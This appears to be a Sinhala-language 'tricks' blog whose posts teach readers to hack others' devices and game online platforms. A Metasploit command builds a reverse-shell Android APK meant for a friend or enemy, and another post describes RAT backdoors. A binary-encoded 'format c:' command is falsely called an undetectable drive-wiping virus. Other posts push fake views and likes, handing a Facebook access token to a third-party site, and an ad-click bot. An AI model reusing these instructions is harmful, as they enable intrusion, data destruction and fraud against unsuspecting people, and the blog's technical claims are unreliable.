Tricks Lanka

Top Paying Sites 2017

Fast Way To Earn Money

100% Free Bitcoin

My Blog WidgetsMy Blog WidgetsTechtunes

Monday, August 19, 2019

How to make hosts with GameGuardian

How to make hosts with GameGuardian.


Image result for game guardian


1. Create account in Virtual (Don't use hosts and GameGuardian)


2. After finished creating account exit the game (Virtual too)

3. Turn on hosts and open GameGuardian

4. Click "Fix it" then press "Record Logcat"

5. Wait GameGuardian show up then start

6. Open the game and play 1 match

7. Minimize the game and download QuickEdit and JuiceSSH

8. Add JuichSSH connection as local machine

9. Connect to your android device and type "grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' (Your GameGuardian Logcat file"


10. Copy everything and go to "https://www.textfixer.com/tools/remove-duplicate-lines.php"


11. Remove all duplicated lines and check IP if not found in hosts add it but if found don't add more

Posted By: Sankalpa Bandara on Monday, August 19, 2019

Saturday, August 12, 2017

100% නොමිලේ Youtube 500 Views ----> ඉක්මන් කරන්න...

<----100% නොමිලේ  Youtube 500 Views ---->






ඔන්න යාලුවනේ ඔයාලට අදත් අලුත්  Trick එකක් අරගෙන අවා..කවුරු උනත් නිකන් දෙන දේවල් ගන්න අකමැති නෑනෙ..දැන් ගොඩක් අය Youtube Channel කරනවනෙ..සමහර අය ජොලියට සමහරු සල්ලි හොයන්නත්  Channel කරනවනෙ.. මම අද ඔයාලට කියල දෙන්නෙ ඒ ඔක්කොටම හරියන්න නියම  Trick එකක්..නිකන් දෙනව කිවුවොත් කවුද එපා කියන්නෙ..ඇත්තටම 500 නෙවෙ මේක Unlimited ගන්න පුලුවන්..කොහොම හරි නිකන් ඉදල Unique 500 Youtube Views දෙන්නෙ කවුද..
අපි බලමු කොහොමද මේක කරන්නෙ කියල..
මෙහෙමයි යාලුවනේ..අලුතින් Site එකක් Release උනා Fiverr Site එකට සමාන..Internet Money කරන ඕන කෙනෙක් දන්නවනෙ Fiverr කියන්නෙ මොකද්ද කියල..Fiverr වාගේ අලුත් Site එකක් Release උනා ඒකෙ Seller කෙනෙක් තමයි මේ Offer එක දෙන්නෙ..Site එක අලුතින් Release උන නිසා..හැබැයි කියන්න ඕනෙ මේක Limited time Offer එකක් මොකද Seller ට හිතුන ගමන්  Gig එක ඒ කියන්නෙ මේ Offer එක Close කරන්න පුලුවන්..මම හිතන විඩියට මේ Site එක පොඩ්ඩක් Rank එහෙම නගිනකන් Offer එක දෙයි..කොහොමහරි ඉක්මන් කරන අයට වාසී..

මුලින්ම පහල Link එක Click කරල Site එකට යන්න..


මේ වගෙ Page එකක් එයි


දැන් Register Button එක Click කරන්න

දැන්මේ  වගෙ Page එකක් එයි



මේ Form එක Fill කරල Register Button එක Click කරන්න..නෙත්නම් ඊට පහලින් තියන Button Faceook එකෙන් හරි Google එකෙන් හරි Log වෙන්නෙ.
ඔයාගෙ Email එකට Confirmation Email එකක් එයි..
ඒක Click කරල Email එක Confirm කරන්න..

ඊට පස්සෙ ඔයාගෙ Username Password දීල Anygignow Account එකට Log වෙන්න..

දැන් මේ Link එක Click කරන්න

Click Here


මෙහෙම Page එකක් එයි.




මේකෙන් Buy For 0.00 USD Button එක Click කරන්න..





දැන් මේවගේ  Page එකක් එයි..මේකෙන් Get For Free Button එක Click කරන්න..




වැඩේ හරි යාලුවනේ...දැන්ග Views ත්ත වගේ තමයි..දැන් කරන්න තියෙන්නෙ ඔයාලට පේනව send a message කියල Message Box එකක්..ඒ Box එකට ඔයාට Views ඕන Video එකේ Link එක Paste කරල Send Button එක Click කරන්න..දවස් දෙකකින් විතර බලන්න ඔයාගෙ Video එකේ Views වැඩි වෙයි..තව දෙයක්..මම කිවුවනෙ මේකෙන් Unlimited Views ගන්න පුලුවන් කියල..එකයි තියෙන්නෙ..Fake Account හදල Views ගන්න එක.
.Account 20 හදුවොත් Views 10000 යි..Fake Account හදනව නම් ෂේපෙ කරන්න මේක ඉන්නෙ මොලකාරයෝ ටිකක්..Gig ඒකේම දාල තියනවනෙ Limited One Per Account කියල..ඔයාලත් Try කරල බලන්නකො..

Posted By: Admin on Saturday, August 12, 2017

Wednesday, August 9, 2017

Android Mobile Hacking - SMS,Contact Details,Call History,Personal Data Hack කරන්නෙ කොහොමද?

SMS,Contact Details,Call History,Personal Data                Hack කරන්නෙ කොහොමද?




Hi යාලුවනේ..ගොඩ කාලෙකට පස්සෙ..කට්ටියට මව මතක ඇති කියල හිතනව..යාලුවොන්ට තියන ගැටලුත් එක්ක Tricks Lanka Blog එක අයෙත් ගොඩ ගන්න ඔනෙ කියල හිතුන..අලුත් Tricks ඉගෙනගන්න Blog කියවන්න අස යාලුවෝ තාම ඉන්නව කියල හිතුන නිසා අයෙත් එක පටන් ගන්න කියල හිතුව..

හොදයි යාලුවනේ අපි වැඩිය කතා නැතුව කෙලින්ම වැඩේට බහිමු..කීප දෙනෙක් අහල තිබුන Android Hack කරන්නෙ කොහොමද ඒ වගේම Messages,Contacts,Call History වගේ වෙන කෙනෙකුගෙ Personal Details ගන්නෙ කොහොමද කියල..අද මම ඒ ගැන පොඩ්ඩක් පැහැදිලි කරන්නම්..Hacking කිවුවහම කට්ටිය දන්නවනෙ ඉතින් කලින් Blog එක කියවපු අය නම් Hacking කියන්නෙ මොකද්ද කියල දන්නව..
මෙහෙමයි යාලුවනේ..Android/Mobile Hacking ගත්තම ඒක Hacking වල එක කොටසක්..ඒ වගෙම මම මේ කියල දෙන Method එක Advanced Hacking ගනයට වටෙන Trick එකක්..ඒ වගේම Android Hacking Windows Hacking වලට වඩා සහෙන්න වෙනස්..අපි Hack කරන්න භාවිතා කරන Tools උනත් එකකට එකක් වෙනස්..නමුත් අපිට පහසුවෙන් Android/Mobile ආශ්‍රයෙන් කරන Hacking Tricks කරන්න පුලුවන්..මොකද ඕන කෙනෙක් දන්නව Android වල Security අඩු වගේම Windows,Linux වගේ Powerful නෑ..
Windows වල වගේ Android වලත එක එක Hacking Categories තියනව..මේකත් එක Hacking Category එකක්.. 
මම අද ඔයාලට කියල දෙන්නෙ RAT(Remote Administration Tools)ගැන..අපිට ලේසියෙන් මේ Tools Use කරල Victim(Hack වෙන කෙනා හෙවත් ඔබගේ යාලුවා හෝ වෙන අයෙක්) ව Hack කරල ඒයාගෙ Mobile එකේ Full Control එක අපේ අතට ගන්න පුලුවන්..
අපි බලමු කොහොමද මේක වෙන්නෙ කියල..ඔයාලට ම්ම මේ ගැන කලින් ලිපියක් දැම්ම..Android Hacking With Kali Linux

කලින් ලිපිය කියවන්න

ඒකේ තියන විදියට කරන්න අලුත් Hackers ලට බෑනෙ(අලුත් Hackers ල කිවුවෙ Hacking වල මුල් ලමාවියේ කස්ටියට හොදේ).Hikzz..මොකද ඒකට හොද Coding දැනුමක් තියෙන්න ඕනෙ වගේම Kali Linux OS එක ගෙන හොද අවබෝදයක් තියෙන්න ඕනෙ..නමුත් මේ විදියට Hacking Method Test කරන්න එහෙම කිසිම දැනුමක් ඕනෙ නෑ..අද Post එක කියවපු කෙනෙකුට උනත් මේක කරල බලන්න පුලුවන්..
මොකද මේ වැඩ වලට අලුතින් එක එක Programs/Tools Release වෙනව..අපිට ඒ Tool එකක් කරල ලේසියෙන්ම මේ වැඩේ කරන්න පුලුවන්..ගොඩක් User Friendly වගේම හොද GUI (Graphical User Interface) එකක් මේ Tool වලට තියනව වගේම හරිම පහසිවෙන් Use කරන්නත් පුලුවන්..



 අපි බලමු RAT වල ක්‍රියාකාරීත්වය(මීය එහෙම නෙවෙයි ඈ)
RAT වලට ගොඩක් විවිධ Tools Release වෙනව.
DarkComet කියන්නෙ දැනට වැඩිම පිරිසක් භාවිතා කරන Android RAT එකක්...RAT එක වෙන්න Poweful වෙන්න අපිට ඒකෙන් කරන්න පුලුවන් වැඩ ප්‍රමානය වැඩි..නමුත් DarkComet RAT එක මම Recommend කරන්නෙ නෑ මොක්ද ගොඩක් අය තමන්ගෙ RAT Server එක Share කරන්න මේ වගෙ Tools වලට Bind කරල දෙනව..

RAT ගැන අති..අපි බලමු මේක වෙන්නෙ කොහොමද කියල..අපි මේ RAT Tool එකක් Use කරල Server.exe කියල EXE File එකක් කරනව..ඒක තනිකරම Backdoor Malware එකක්...ඒ කියන්නෙ අපිට ඒ File එක Use කරල වෙන කෙනෙකුගෙ PC එකට ලොග් වෙන්න පුලුවන්..ඒ PC එකේ Full Control එක අපේ අතට ගන්න පුලුව්න්.මුලින්ම අපි අපේ ඒ කියන්නෙ RAT Tool එක Run කරන PC එකේ Port එකක් Open කරනව..ඊට පස්සෙ අපෙ PC එකේ IP Address එකයි Open කරපු Port එකයි දාල Server.exe File එක හදනව..කවුරු හරි Server.exe කියන File එක Open/Double Click කරොත් එයාගෙ PC එකේ Port එකක් Open කරනව Server.exe කියන Malware එක විසින්..ඊට පස්සෙ අපේ RAT Tool එකෙන් ඒ PC එකේ Open Port එක හරහා PC එකට Log වෙලා අපේ RAt Tool එකෙන් පෙන්නව Victim ගෙ සියලුම විස්තර ටික..කොටින්ම කිවුවොත් Server.exe එකෙන් කරන්නෙ අපේ PC එක සහ Victim PC එකට Connect කරන එක..මේ මම කිවුවෙ Windows Hack කරන විදිය..Android වලත් මේ විදිහමයි..වෙනසකට තියෙන්නෙ Android වල අපි APK එකක් තමයි Create කරන්නෙ..



මේ විදියට තමයි RAT Tool වලින් වෙන කෙනෙක් ගෙ PC එකක් හෝ Mobile එකක් Hack කරන්නෙ..කොහොම හරි PC එකකට හරි Phone එකකට හරි Log උනාම කරන්න පුලුව්න් මොනවද කියල ඉතින් දන්නෝ දනිති..Hikzz..නැ නෑ හැමෝටම කියල දෙනව..
හොදයි යාලුවනේ..අදට ඇති..ඊලග පෝස්ට් එකෙන් කොහොමද RAT Tools Use කරන්නෙ ඒව Victim ට යවන්නෙ කොහොමද කියාත් අපි ආරක්ශා වෙන්නෙ කොහොමද කියල කියල දෙන්නම්..
තව දෙයක්..Hacking වලට එක එක Apps/Tools තියනව නමුත් ඒවගෙන් මේ කාර්ය 100% කරන්න බෑ..හරි Tool එක ‍තෝරගන්න ඕනෙ..
මම හිතව ඔයාලට මේ ලිපිය වැදගත් වෙන්න ඇති කියල..අද ඉදන් දිගටම Post දාන තමයි බලාපොරොත්තු වෙන්නෙ..යාලුවොන්ගෙන් ඉල්ලන්නෙ එක දෙයයි අපිත් එක්ක ඉන්න Like එකක් Comment එකක් දාන්න ඒ වගෙම ඔයාලට තියන ගැටලු ඉතිරිපත් කරන්න..පුලුවන් උපරිමෙන් ඒවට පිරිතුරු දෙනව කියල Promise වෙනව.
ඔයාලගෙ ගැටලු මේ ලිපිනයට එවන්න : tricksworld8@gmail.com
Bye හැමෝටම..

Posted By: Admin on Wednesday, August 9, 2017

Friday, December 11, 2015

Unlimited Facebook Like නොමිලේම ගමු..[100% working & Trusted]

...Unlimited Facebook Like නොමිලේම ගමු...
[100% working & Trusted ]



ඔන්න යාලුවනේ අදත් ඔයාලට සුපිරි Trick එකක් කියල දෙන්න යන්නෙ..ගොඩක් කට්ටිය Comment දාල තිබ්බනෙ Free Facebook Like ගැන Post එකක් දාන්න කියල..ඉතින් ඔන්න එයාලට තමයි මේ Post එක..හැමෝම කැමතිනෙ තමන්ගෙ Facebook Page එකට Post වලට එහෙම Like ගොඩාක් එනවනම්..ඔය විදිහට ඔයාට Free Facebook Like ගන්න පුලුවන් ඕන තරම් Website තියනව හැබැයි ගොඩක් ඒව Fake..සමහර Site වල Like ගන්න Point හොයන්න අමාරුයි..තවත් Site වලට යන්නත් බයයි..ඒ කියන්නෙ Facebook Account Hack කරන Site(Phishing) උනත් මේ අතරෙ තියෙන්න පුලුවන්..ගොඩක් අය මේව දන්නෙ නෑ..නිකරුනේ තමන්ගෙ Account එක Hack කරල දෙනව...ඉතින් ඔය ඔක්කොම හොයල බලල ඒ වගෙම Test  කරල හොදට වැඩ කරන 100% Real Like ලබා දෙන Site එකක් ගැන කියල දෙන්න යන්නෙ...වැඩිය කතා ඕනෙ නෑනෙ..පහල තියන විදිහට වැඩේ කරගන්න...

මුලින්ම  මේ Banner එක Click කරල Site එකට යන්න..


Site එකට ගියහම මේ වගේ Interface එකක් එයි..


මෙහෙමයි යාලුවනේ..මෙතන පොඩි Technic  එකක් තියනව..මන් මුලින්ම ඒ ටික කියල දෙන්නම්..ඔය Pic එකේ තියන විදිහට ඔයාලට මේ Site එකට Direct Log වෙන්න පුලුව්න් ඔයාගෙ Facebook E-mail එකයි Password එකයි දීල...ඔය Alternate Login කියල තියෙන්නෙ..එතනින් ඔයාලට මේ Site එකට Direct Log වෙලා ඔයාගෙ Fanpage එකට Free Like ගන්න පුලුවන්..හැබැයි මේ දවස් වල මේ Site එක Respire කරනව..ඒ හින්ද Fan Page Like ගන්න ටික දවසක් ඉවසන්න වෙයි..ඒත් ඔයාලගෙ Facebook Photos,Videos,Post වගේ ඕන එකකට Free like ගන්න පුලුව්න් දැන් උනත්..මම ඒ Trick එක කියල දෙන්නම් දැනට.මෙහෙමයි..මෙතනදි ඔයාලගෙ Facebook Account එකේ ආරක්ශාව වැඩි වෙන්න මේ Site එකෙන් අලුත් Technic එකක් Use කරනව..ඒ නිසා Site එකට Log වෙන්න ටිකක් අමාරුයි..ඒත් එහෙම කියල බෑනෙ අපි වැඩේ කොහොම හරි කරගන්න එපැයි..ම්ම පහල දාල තියන විදිටහ වැඩේ කරන්න..


මුලින්ම ඔයාගෙ Facebook Account එකට Log වෙලා ඉන්න..බයවෙන්න එපා කව්වුරුත් මේ Site එක Fake නෙවෙයි..කාගෙවත් Account Password එහෙම Hack/Crack කරන්නෙ නෑ..මොකද මම මේක Test කරල තියනව..කට හරි සැක නම් Likes ගත්තට පස්සෙ ඔයාගෙ FB Password එක Change කරගන්න..

මෙතන වෙන Technic එක තමයි මේ Site එකෙන් Facebook වලින්  දෙන Access Tocken එකක් Use කරල තමයි Site එකට Log වෙන්න දෙන්නෙ..ඒක ගොඩක් Safe..අපි දැන් ඔයාගෙ FB Account එකට Access Tocken එකක් හදන විදිහ බලමු..

මුලින්ම ඔය CLICK HERE TO ALLOW PERMISSIONS! Button එක Click කරන්න.


දැන් ඊලගට Page යන එකෙන් Skip ad කරන්න..දැන් ඔයාලගෙ Facebook Account එකට Log වෙන්න කියල Request එකක් එයි..Log වෙලා ඉන්න අයට ප්‍රශ්නයක් නෑ..HTC App එකක් FB Account එකට Connect වෙන්න අහයි..මේ වගේ..
ඔතන පහල ඇති OK කියල Button එකක්..දිගටම OK කර කර යන්න 3 පාරක් විතර...
දැන් මේ වගේ Success කියල Code එකක් වැටෙයි..එතනදි Address Bar එකේ වැටෙන URL එක Copy කරගන්න..ඒක තමයි අපි Hublaa Account එකට Log වෙන්න Use කරන Access Token එක..දැන් ලොකුම වැඩේ හරි...

දැන් ඔය Copy කරගත්ත URL එක ඒ කියන්නෙ Access Token එක ඔය Login කියල Text Box එකට Paste  කරන්න..ඊට පස්සෙ Login කියන Button එක Click කරන්න..



ටික වෙලාවකින් ඔයා Hublaa Account එක ට Auto Log වේයි..මේ විදිහට Security Code එකක් Type ආවොත් ඒක Type කරල Continue කරන්න.
දැන් ඉතින් තියෙන්නෙ වැඩ්ඩ වගේ Free Fake Like ගන්න එක තමයි..ඔයාලට මොකුත් කරන්න දෙයක් නෑ මේ Site එකන් Free Like ගන්න..තනිකරම Free..කොහොමද වැඩේ ඈ..හරි හරි..අපි තාම Likes ගත්තෙ නෑනෙ..කස්ටියට තාම Sure නෑ මම කියන දේ..එහෙනම් බලන්නකෝ..පහල තියන විදිටහ කරොත් ඔයාලට Free Likes ගන්න පුලුවන්...

ඔයා එකට උනානම් මේ විදිහට කියල වැටෙයි...
ඔන්න බලන්න යාලුවනේ Main Service කියල තියන තැන..ඔයලට Free Likes විතරක් නෙවෙයි Comment,Followers උනත්  ගන්න පුලුවන්..හැබෙයි යාලුවනෙ මම Try කරේ AutoLike විතරයි..ඔයාල ඉතින් අනිත් ඒවත් Try කරල බලන්න..හරි..දැන් AutoLike කියන Button එක Click කරන්න...

දැන් දෙපාරක් Skip Ad Click කරල Auto Like Panel එකට යන්න පුලුවන්..
මේ තමයි Page එක..

මගේ මේ Tricks Lanka FB Account එකේ Profile Picture එකක් විතරයි තියෙන්නෙ..මන් දැන් යන්නෙ ඕකට Fake Like ටිකක් වැඩියෙන් දාගන්න..
දැනට තියෙන්නෙ Like  699 යි...Uuuhhhh..මදිනේ...

ඔන්න බලන්න මම Hublaa එකෙන් Fake Like Send කරහම Like කීයද කියල ඈ..කස්ටිය උඩ යයි...


දැන් ඔයාට කැමති ‍Photo,Video,Post එකක් තෝරගන්න..ඊට පස්සෙ ඒ Item එකේ Title එක Click කරන්න..දැන්ම Submit කරන්න යන්න එපා Likes එන්නෙ නැති වෙයි..ඔයා Item Title එක Click කරහම මේ විදිහට එයි..(මම මේකෙ Profile Picture කියන Title එක Click කරනව.)



බලන්න මේකෙ Title Name එක නෑනෙ..දැන් හරි..දැන් Submit Button එක Click කරල විනාඩියක් ඉන්න..හරියට වැඩේ උනා නම් මේ විදිහට Message එකක් එයි..
ඔන්න එහෙනම් වැඩේ හරි..බලමු මගේ Profile Picture එකට Like කීයද කියලා...


කොහොමද Like 1001 යි..මේ Hublaa Liker එකෙන් ඔයාලට එක වරකදි Free Likes 300 වඩා ලබෙනව..ඉතින් කවුද එපා කියන්නෙ..ඔක්කොම නිකන්නෙ...දැන් නම් ඕන් කාටවත් කාගෙන්වත් FB Likes හිගාකන්න ඕනෙ නෑ..Respect එකේ මේ Trick එක Try කරල බලන්නකො..ඒ විතරක් නෙවෙයි Auto Comments ,Followers උනත් ගන්න පුලුවන්.ඔයාල ම්ට Thanks කරයි..හරි එහෙනම් යාලුවනේ ඔන්න ඔයාල කිවුව විදිහටම Free Facebook Fake Likes ගන්න හැටි Full Post එකක්ම දැම්ම..කස්ටිය Try  කරල බලල Comment එකක් Like එකක් එහෙම දාන්න හොදේ..ප්‍රශ්න තියනවනම් අහන්න...ඔක්කොටම  Thanks...

Posted By: Unknown on Friday, December 11, 2015

Tuesday, December 8, 2015

Adf.ly Hack කරල Unlimited මුදල් උපයමු...$$$$..[100% working & Real Money]

Adf.ly Hack කරල Unlimited මුදල් උපයමු...[100% Working]..
$$$$$$$$$$$$



ඔන්න යාලුවනේ අද ඔයාලට නියම වැඩක් කියල දෙන්න යන්නේ...ඇත්තටම මේක Christmas Gift එකක් විදිහට තමයි මම දෙන්නෙ ඔයාලට...කවුරුත් එපා කියන එකක් නෑ මේකට නම්..මොකද කවුද අකමැති නිකන් ඉදල සල්ලි හොයන්න..ඔයාල මොකුත්ම කරන්නෙ නැතුව නිකන්ම ඉදල සල්ලි හොයන ක්‍රමයක් තමයි මන් අද කියල දෙන්නෙ..හැමෝම දන්නවනෙ Adf.ly ගැන..Link Short කරල සල්ලි හොයන ක්‍රරමය ගැන..නොදන්න කෙනෙක් නෑ කියල හිතල තමයි මේ Trick එකක් කියල දෙන්නෙ..මොකද මේ වැඩේට Adf.ly Account එකක් තියෙන්න ඕනෙ..ඔයා හොයන සල්ලි Add වෙන්නෙ මේ Account එකට තමයි..ඉතින් මට තියන වෙලාවත් එක්ක බලනකොට ඔක්කොම කියල දෙන්න බෑ..අනික Net එකේ Account එකක් හදාගන්න එක පොඩි බබාලගෙ වැඩක්නෙ..ඒ හින්ද වැඩිය කතා නැතුව වැඩේට බහිමු...
ඔන්න යාලුවනෙ මන් මේ දවස් වල කට්ට කාල කාල හදුව නියම Hacking Programme එකක්..ඇත්තටම මේව ගේ ඒව Hacking Programme නෙවෙයි..මේවට කියන්නෙ Bot කියල..ඒ කියන්නෙ Robot කෙනෙක් වගේ අපිට ඕන දේ Automatic කරගන්න පුලුවන්..මන් මේ හදපු Bot එකෙන් පුලුවන් Adf.ly වලට Auto Click ලබා දෙන්න..දැන් ඔයාලට කට්ට කාගෙන Facebook,Twitter,Youtube වල Adf.ly Link Share කර කර Clicks හිගාකන්න ඕනෙ නෑ..මේ Bot එකෙන් ඔයාලට Free Auto Clicks ලබා දෙයි..කස්ටියට හිතාගන්න බැරි වෙයි කොහොමද මෙහෙම වෙන්නෙ කියල..මේ මගේ උත්සාහයයි කැපවීමයි..මමත් ඉස්සර Adf.ly Link වලට Click හිගා කෑව..හැබයි මටත් ආසාවක් තිබ්බ Auto click Bot එකක් Use කරල Clicks ගන්න...මොකද ඒක තමයි ලේසිම වැඩේ..එහෙම එකක් හොයා ගන්න මන් Net එක පීරුවා..Bots ටිකක් නම් හම්බුනා..ඒත් වැඩක් නෑ ගොඩක් ඒව වැඩ කරන්නෙ නෑ..Virus වලින් පිරිල..සමහරක් ඒවට Activation Keys ඉල්ලනව..ඒක් මත පිත වැඩක් කියල හිතුන හින්ද තමයි Coding කරන්නත් දන්න එකේ Bot Programme එකක් හදන්න පොඩි  Try එකක් දැම්මෙ..පෙර පිනකට වැඩේ ගොඩ ගියා..Hizzz...කොහොම හරි Programme එක හදල Use කරලත් බලුව..තනියම කන පුරුද්ද මන්ලග නැති හින්ද ඔන්න ඔයාලටත් මේක Share කරන්න කියල හිතූව..මොකද අපේ කොල්ලන්ට මේ වගේ දේවල් ලැබෙන්නෙ නෑ නිකන්..සුද්දො උන්ගෙ උන්ට විතරක් Share කරල නිකන් ඉන්නව..ඉතින් ඒ හින්ද Christmas Gift එකක් විදිහට මේක දෙනව..මටත්  ඕනෙනම් මේක Sell කරල හොද ගානක් හොයා ගන්න පුලුවන්..ඒත් ඒක නෙවේ මගේ සතුට..අපේ රට ගැන අපි හිතන්න ඕනෙනෙ..ඒ වගෙම මේක පලවෙනි Version එක හින්ද Design එක ටීකක් අවුල්..කස්ටිය ගනන් ගන්න එපා...හැබැයි ගිනි කසය වැගේ Clicks නම් දෙනව ඕන්..කට්ටියම Try කරල බලන්නකො..Like එකක් Comment  එකක් එහෙම දාන හොදේ ටිකක් Form වෙන්න..මොකද මේක ඔයාලට නිකන් දෙන නිසා මට ලැබෙන්නෙ සතුට විතරයි..යාලුවො තරහ නොවී Like Comment එකක් විතරක් දාන්නකෝ..එහෙනම් කට්ටියම Unlimited Money හොයන්නකෝ...පලහ දාල තියනව Link  එක..Download කරල Double Click කරන්න විතරයි තියෙන්නෙ...$$$$$



Click Here To Download Adf.ly Bot Autoclicker v5.0



මේක කරන හැටි නොදන්න කෙනෙක් ඕනම දෙයක් අහන්න..නැතත ඊලග එකෙන් මේක කරන විදිහ කියල දෙන්නම්...

Posted By: Unknown on Tuesday, December 8, 2015

Sunday, November 29, 2015

යාලුවගෙ Android Phone එක Hack කරල ලොකු Fun එකක් ගමු...[-----Kali Linux-Hack Android Phone Using METASPLOIT-----]

යාලුවගෙ Phone එක Hack කරල ලොකු Fun එකක් ගමු...



ඔන්න යාලුවනේ අද ඔයාලට ටිකක්  ලොකු Hacking Trick එකක් කියල දෙන්න යන්නෙ...දැනට Hacking Tricks කීපයක්ම මේ Blog එකේ දැම්මනෙ..කැමති අය කරලත් බලන්න ඇති..හරි..ඔයාල දන්නවනෙ මේ  Hacking ගැන සාමාන්්‍යෙන් Blog වල දාල උගන්නන්න බෑ කියල..එක විහිලුවක්..ඒත් අපේ යාලුවොන කරගන්න පුලුවන් විදිහට Hacking Tricks ටිකක් කියල දුන්න ඔන්න..එහෙනම් අද අපි බලමු කොහොමද Kali Linux Use කරල Android Phone  එකක් Hack කරන්නෙ කියල..හැබැ මේකනම් යාලුවනේ මාර Fun වගේම Advanced Trick එකක්..ටිකක් වැඩක් කරන්න ඔනෙ..මොකද මේ වැඩේ හරියට කරගතොත් ඔයාට මරු වැඩ ටිකක් කරගන්ඩ පුලුවන්..ඔයා Hack කරන Phone එකේ තියන Photos,Music,APK Files,TXT File,Screen shot,Cam Shots වගේම Phone එකේ පාලනය අපේ අතට ගන්න පුලුවන්..ඉතින් එතකොට මොනවද කරන්න බැරි..ඒ එකෙන් ඔයාට ඕන විදිහට එහෙමත් ගන්න පුලුවන්..අය ඉතින් මාර පට්ට වැඩක්..දන්නේ දනිති හොදේ..හරි එහෙනම් අපි වැඩේ පටන් ගමු..මෙහෙමයි යාලුවනේ..මේ Trick එක මම එක Post එකෙකින් දාන්නෙ කොටස් දෙකකට කඩල දවස් දෙකකින් දාන්නම්..යාලුවෝ ටික තරහ වෙන්න එපා..මේ දවස් වල කාලය ටිකක් හොයා ගන්න අමාරුයි..ඒවගේම ටිකක් ලොකු Trick එකක් නිසා..එහෙනම් මෙතන ඉදන් අපි Android Phone එකක් Hack කරන විදිහ අත්හදා බලමු බලමු...

මේ වැඩේ ලොකු උනාට ඕන කරන්නෙ Kali Linux විතරයි හොදේ....



මුලින්ම Kali Linux Open කරගෙන අලුත් Command Window(windows වල නම් Command Prompt වගේ) එකක් ගන්න(Root Thermial[Application--->Accessories--->Root Terminal])...ඊට පස්සෙ මේ Code එක හරියටම Type කරන්න...

Code:-
msfpayload android/meterpreter/revers_tcp LHOST= LPORT=4040 R > androidhack.apk


මේ Code එක මෙහෙමම ඔයාගෙ Command Windows එකේ Type කරන්න..වැරදුනොත් වැඩේ අවුල් හොදේ...දැන් මේ Code එකේ LHOST කියන තැනට ඔයාගෙ IP(internet Protocol)එක දෙන්න ඕනෙ..ඒකට අලුත් Theminal එකක් අරගෙන මේ එක ගහන්න...

Code:-


ifconfig



දැන් ඔය inet addr (IP)එක Copy කරගෙන ඔයා කලින් Type කරපු Code එකේ LHOST කියන තැනට Paste කරන්න..දැන් Code එක සම්පූර්නයි..දැන් Enter Button එක ඔබන්න..Please wait...
විනාඩියක් යන්න කලින් androidhack.apk කියල Apk එකක් Create වෙනව...



හරියට Apk File එක Create උනා නම් මොකුත් Error එකක් එන්නෙ නෑ..Crate උන එක APK File බලන්න ඕනෙ නම් ls Code එක  Type කරල Enter ඔබන්න..එත්කොට මෙහෙම ඔයා Create කරපු File එක පෙන්නයි..





හපෝ..ඔන්න දැන් එක වැඩක් හරි..දැන් ඔයාට කරන්න තියෙන්නෙ ඔයාගෙ යාලුවාට හරි හතුරට හරි මේ  APK එක දෙන එක..එයා ඔය File එක එයාගෙ Android Phone එකට Install කරොත් විතරයි අපේ ලොකුම වැඩේ සම්පූර්න වෙන්නෙ...එහෙම උනා නම් අය ඉතින් එයාගෙ Personal Details පවා අපි ලග..කොහොමද වැඩේ..
හරි..එහෙනම් යාලුවනේ ඔයාල ඔය ටික කරන්නකො හරියට..ඉතිරි ටික වෙන Post එකකින් කියල දෙන්නම්...හැමෝටම Good Bye...

Posted By: Unknown on Sunday, November 29, 2015

Friday, November 27, 2015

Computer වයිරස් හදල පොඩි Fun එකක් ගමු..<----Notepad Cool Tricks---->

...Computer වයිරස් හදල පොඩි Fun එකක් ගමු...


ඔන්න යාලුවනේ අදත් ඔයාලට Notepad වලින් පොඩි Fun එකක් ගන්න හැටි කියල දෙන්න යන්නේ...හැමෝම දන්නවනෙ Virus ගැන..ඒවට මොනවද කරන්න පුලුවන් ඒවගේ Virus එකක් Computer එකට ඇතුලු උනොත් මොකද වෙන්නෙ කියල කවුරුත් දන්නවනෙ..ඒත් හැමෝම දන්නෙ නෑ ඒ ලොකු වැඩ කරන Virus හදන්නෙත් Notepad වගේ පොඩි  Text Editors වලින් කියල..පොඩි Code කොටසකින් තමයි ලොකු වැඩ වෙන්නෙ..Computer එක Crash වෙනව වගේ ඒව.ඒ විතරක් නෙවෙයි මුලු පරිගනක පද්දතියම බිද දැමීමට පවා පුලුවන් මේ පොඩි Virus වලට...ඉතින් මන් Notepad Tricks පටන් ගත්ත එකේ Virus හදන විදිහ කියල දුන්නෙ නැත්තම් එක මදිකම්ක් වගේනෙ..ඒ හින්ද ඕන් පොඩි පොඩි Virus ටිකක් හදන විදිහ කියල දෙන්නම්..හැබැයි මේව වැරදි විදිහට එහෙම Use කරන්න නෙවෙයි කියල දෙන්නෙ..හොදේ..

1.C Drive එක Format කරමු...

මේක නම් ටිකක් භයානක Virus එකක්..මොකද මේ Virus එක Run උන ගමන් C Drive එකේ තියන System File ඔක්කොම Delete වෙලා යනව..අය ඉතින් Machine එකෙන් වැඩ ගන්න නම් Format කරන්නම් වෙයි..හොදම වැඩේ කියන්නෙ මේව පොඩි Batch Programming නිසා Virus Guard එකකින්වත් අල්ලන්නෙ නෑ..ලොකු Virus Programme නම් අල්ලනව..හැබයි මේ  Virus එක Encrypt කරල තියෙන්නෙ..ඒ හින්ද ලොකෙ තියන එක Virus Guard එකකටවත් මේක අහුවෙන්නෙ නෑ...තරහ කාරයෙක් එහෙම ඉන්නවනම් දීල බලන්න...

Code:-
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000

මුලින්ම Notepad Open කරන්න..මේ Code එක Paste කරන්න..දැන් මෙක .exe විදිහට save කරන්න..Open කරන්න එහෙම එපා හොදේ..

2.D Drive එක Format කරමු...

මේ Virus එකනම් භයානක නෑ..හැබයි D Drive එක සුද්ද වෙලාම යන්ව..වටිනා කියන File එහෙම තිබ්බොත් අය හොයනව බොරු..

Code:-
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000

මුලින්ම Notepad Open කරන්න..මේ Code එක Paste කරන්න..දැන් මෙක .exe විදිහට save කරන්න..

3.Boot Loader එක Delete කරමු...

